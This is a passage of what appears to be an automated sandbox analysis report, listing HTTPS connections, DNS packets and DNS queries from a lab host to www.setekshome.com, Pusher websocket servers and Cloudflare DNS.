                                                                    Aug 4, 2024 16:24:14.201085091 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.201092005 CEST44349718185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.201150894 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.201569080 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.201581955 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.201796055 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.201803923 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:14.202218056 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:14.202227116 CEST44349718185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.181314945 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:15.181971073 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:15.182075024 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:15.183386087 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:15.183489084 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:15.185251951 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:15.185308933 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:15.185431004 CEST4434971452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:15.185517073 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:15.185518026 CEST49714443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:15.324903965 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.325309992 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.325319052 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.326307058 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.326498985 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.328713894 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.328741074 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.328896046 CEST44349716185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.328970909 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.328970909 CEST49716443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.361073971 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.361483097 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.361613035 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.361624956 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.361918926 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.361927032 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.363074064 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.363204002 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.363348961 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.363522053 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.363933086 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.363971949 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.364120960 CEST44349712185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.365164042 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.365164042 CEST49712443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.365324974 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.365379095 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.368716955 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.368745089 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.368902922 CEST44349715185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.368958950 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.369262934 CEST49715443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.369401932 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.369409084 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.369569063 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.369576931 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.370424986 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.370497942 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.371011972 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.371145010 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.371164083 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.371191025 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.371284962 CEST44349717185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.371309042 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.372304916 CEST44349718185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.372508049 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.372534037 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.372560024 CEST49717443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.372678041 CEST44349713185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.372704983 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.372710943 CEST44349718185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.372761011 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.372761011 CEST49713443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.376298904 CEST44349718185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.376734972 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.377232075 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:15.377300024 CEST44349718185.111.234.27192.168.2.7
                                                                    Aug 4, 2024 16:24:15.377579927 CEST49718443192.168.2.7185.111.234.27
                                                                    Aug 4, 2024 16:24:16.068895102 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:16.068932056 CEST4434971952.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:16.069238901 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:16.069421053 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:16.069437981 CEST4434971952.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:16.706784964 CEST4434971952.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:16.709646940 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:16.709662914 CEST4434971952.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:16.711216927 CEST4434971952.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:16.711280107 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:16.712030888 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:16.712069035 CEST4434971952.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:16.712125063 CEST49719443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.071719885 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.071815968 CEST4434972152.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:20.072047949 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.072376013 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.072415113 CEST4434972152.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:20.718219042 CEST4434972152.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:20.718767881 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.718805075 CEST4434972152.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:20.721991062 CEST4434972152.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:20.722064972 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.722896099 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:20.722914934 CEST4434972152.48.38.99192.168.2.7
                                                                    Aug 4, 2024 16:24:20.722970963 CEST49721443192.168.2.752.48.38.99
                                                                    Aug 4, 2024 16:24:21.288261890 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.288387060 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.288476944 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.289544106 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.289586067 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.351490021 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.351572990 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.351675034 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.352094889 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.352118015 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.764275074 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.764957905 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.765026093 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.765952110 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.766035080 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.768507957 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.768578053 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.768908024 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.768928051 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.822293043 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.836391926 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.836721897 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.836740971 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.839941025 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.840034008 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.841033936 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.841101885 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.841191053 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.841207981 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.884550095 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.906109095 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.906352997 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.906459093 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.906655073 CEST49722443192.168.2.7162.159.61.3
                                                                    Aug 4, 2024 16:24:21.906703949 CEST44349722162.159.61.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.987227917 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.987412930 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:21.987530947 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.993027925 CEST49723443192.168.2.7172.64.41.3
                                                                    Aug 4, 2024 16:24:21.993060112 CEST44349723172.64.41.3192.168.2.7
                                                                    Aug 4, 2024 16:24:29.060014009 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:29.060059071 CEST4434972452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:29.060168982 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:29.060576916 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:29.060592890 CEST4434972452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:29.710172892 CEST4434972452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:29.710634947 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:29.710650921 CEST4434972452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:29.712151051 CEST4434972452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:29.712208986 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:29.713176012 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:29.713217020 CEST4434972452.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:29.713320017 CEST49724443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:31.073321104 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:31.073375940 CEST4434972599.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:31.073527098 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:31.073890924 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:31.073903084 CEST4434972599.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:31.709136009 CEST4434972599.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:31.709690094 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:31.709707975 CEST4434972599.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:31.711157084 CEST4434972599.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:31.711225033 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:31.712142944 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:31.712168932 CEST4434972599.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:31.712224960 CEST49725443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.080760002 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.080872059 CEST4434972699.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:35.080987930 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.081367970 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.081398964 CEST4434972699.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:35.915262938 CEST4434972699.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:35.917140007 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.917179108 CEST4434972699.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:35.920569897 CEST4434972699.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:35.920692921 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.927490950 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:35.927510023 CEST4434972699.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:35.927580118 CEST49726443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.075294971 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.075366020 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.075438023 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.084537983 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.084558964 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.704922915 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.705465078 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.705488920 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.709067106 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.709168911 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.784781933 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:46.784898043 CEST4434972799.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:46.784965992 CEST49727443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.091876984 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.091922045 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.091995955 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.092288971 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.092305899 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.709750891 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.710448027 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.710472107 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.714210033 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.714382887 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.716727018 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:50.716866016 CEST4434972899.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:24:50.717008114 CEST49728443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:24:59.261526108 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:59.261576891 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:24:59.261650085 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:59.325301886 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:24:59.325320005 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.091890097 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.092900038 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:00.092940092 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.096462965 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.096587896 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:00.098007917 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:00.098094940 CEST4434972952.30.21.185192.168.2.7
                                                                    Aug 4, 2024 16:25:00.098207951 CEST49729443192.168.2.752.30.21.185
                                                                    Aug 4, 2024 16:25:01.067370892 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.067420006 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.067521095 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.067879915 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.067898035 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.916265011 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.916706085 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.916728020 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.917738914 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.917799950 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.918572903 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:01.918606043 CEST4434973099.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:01.918662071 CEST49730443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.082562923 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.082606077 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.082698107 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.083065033 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.083077908 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.701628923 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.754247904 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.770168066 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.770194054 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.773863077 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.773895025 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:05.773966074 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:05.816696882 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:06.278117895 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:06.278270006 CEST4434973199.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:06.278354883 CEST49731443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:14.075875998 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.075911045 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.076008081 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.076667070 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.076677084 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.784677982 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.785115004 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.785134077 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.786781073 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.786850929 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.787656069 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:14.787702084 CEST443497323.222.214.216192.168.2.7
                                                                    Aug 4, 2024 16:25:14.787764072 CEST49732443192.168.2.73.222.214.216
                                                                    Aug 4, 2024 16:25:16.089118004 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.089179993 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.089262962 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.089644909 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.089664936 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.718394041 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.752177000 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.752214909 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.755867004 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.755939007 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.815624952 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:16.815670967 CEST4434973399.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:16.815751076 CEST49733443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.090670109 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.090779066 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.091268063 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.091268063 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.091368914 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.724251986 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.724961042 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.725025892 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.728595972 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.728718996 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.729535103 CEST49734443192.168.2.799.81.234.0
                                                                    Aug 4, 2024 16:25:20.729620934 CEST4434973499.81.234.0192.168.2.7
                                                                    Aug 4, 2024 16:25:20.729751110 CEST49734443192.168.2.799.81.234.0

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 4, 2024 16:23:54.036355972 CEST4955953192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:23:54.323359013 CEST53495591.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:14.057403088 CEST6141753192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:14.065613985 CEST53614171.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:16.060534954 CEST6355353192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:16.067498922 CEST53635531.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:21.276837111 CEST5230953192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:21.277036905 CEST6341453192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:21.287096024 CEST53523091.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:21.287175894 CEST53634141.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:21.332416058 CEST5914353192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:21.332674980 CEST5561553192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:21.350507975 CEST53591431.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:21.350742102 CEST53556151.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:24:31.064254999 CEST5314853192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:24:31.071904898 CEST53531481.1.1.1192.168.2.7
                                                                    Aug 4, 2024 16:25:14.065884113 CEST5988353192.168.2.71.1.1.1
                                                                    Aug 4, 2024 16:25:14.073774099 CEST53598831.1.1.1192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Aug 4, 2024 16:23:54.036355972 CEST192.168.2.71.1.1.10xc615Standard query (0)www.setekshome.comA (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.057403088 CEST192.168.2.71.1.1.10xaefbStandard query (0)ws-eu.pusher.comA (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:16.060534954 CEST192.168.2.71.1.1.10xe8aeStandard query (0)sockjs-eu.pusher.comA (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.276837111 CEST192.168.2.71.1.1.10x56c2Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.277036905 CEST192.168.2.71.1.1.10x6bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.332416058 CEST192.168.2.71.1.1.10x736cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.332674980 CEST192.168.2.71.1.1.10x7141Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                    Aug 4, 2024 16:24:31.064254999 CEST192.168.2.71.1.1.10x1fcStandard query (0)sockjs-eu.pusher.comA (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:25:14.065884113 CEST192.168.2.71.1.1.10x7eddStandard query (0)stats.pusher.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Aug 4, 2024 16:23:54.323359013 CEST1.1.1.1192.168.2.70xc615No error (0)www.setekshome.comsetekshome.comCNAME (Canonical name)IN (0x0001)false
